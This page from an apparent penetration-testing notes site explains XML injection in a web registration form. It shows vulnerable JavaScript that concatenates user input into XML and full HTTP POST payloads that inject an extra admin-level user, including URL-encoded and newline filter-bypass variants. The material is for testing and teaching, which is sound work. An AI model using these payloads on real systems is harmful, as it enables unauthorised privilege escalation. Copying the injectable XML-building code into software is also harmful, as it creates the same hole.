Hacking
Hacking
Github
Twitter
Hacking & Penetration Testing
Commands
Methodologies
Buffer Overflow
Internal Network
Mobile Testing
Subdomain Enumeration
Web Application Testing
XSS
OOB
IDOR / PrivEsc
Misc
CSRF
XML
SQL
XML External Entities
Commands
Windows Commands
Guides
Mac OS Build
Build A Raspberry Pi Dropbox
Configuring Burpsuite Pro
BugBounty
Manual SQL Injection
Courses
Hack The Box
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered by GitBook

XML

Insert XML payloads in each parameter until you receive an XML error such as <test>

XML declaration allowed only at the start of the document

Now search for ways to build the XML structure to use to your advantage such as JS files and other payloads etc.

function WSregister__old() {
​
	var name = document.getElementById("name").value;
	var username = document.getElementById("user").value;
	var password = document.getElementById("password").value;
​
	var xml = '<?xml version="1.0" encoding="utf-8"?>		';
	xml += '<user>											';
	xml += '	<rule>2</rule>								';
	xml += '	<name>' + name + '</name>					';
	xml += '	<username>' + username + '</username>		';
	xml += '	<password>' + password + '</password>		';
	xml += '</user>											';
​
	$.ajax({

Capture a request and modify the parameter to inject a new user with "rule 1" and see if you can elevate your account.

POST /add_new.php HTTP/1.1
Host: Vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 109
Connection: close
​
name=user1&user=user1</username></user><user><rule>1</rule><name>admin</name><username>admin&password=password

If the application strips some of the characters consider a double injection and URL encoding the payload. Or try submitting it via the application instead

name:        </name></user><user><rule>1<!--
username:    --></rule><name>admin1</name><username>admin1
password:    pentest

Full Payload

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
​
name=%3C%2Fname%3E%3C%2Fuser%3E%3Cuser%3E%3Crule%3E1%3C!--&user=--%3E%3C%2Frule%3E%3Cname%3Ea%3C%2Fname%3E%3Cusername%3Ea&password=pentest

Further Filtering

The check may be case-insensitive, and furthermore it seems that spaces and tabs may be ignored between the tag name and the close tag character but, if we inject a new line it is not filtered!

Try adding new lines to see if they still work:

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: vulnerable.host
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 84
Connection: close
​
name=</name></user><user><rule
>1<!--&user=--></rule
><username>l33t&password=1337

​

Web Application Testing - Previous
CSRF
Next - Web Application Testing
SQL
Last updated -3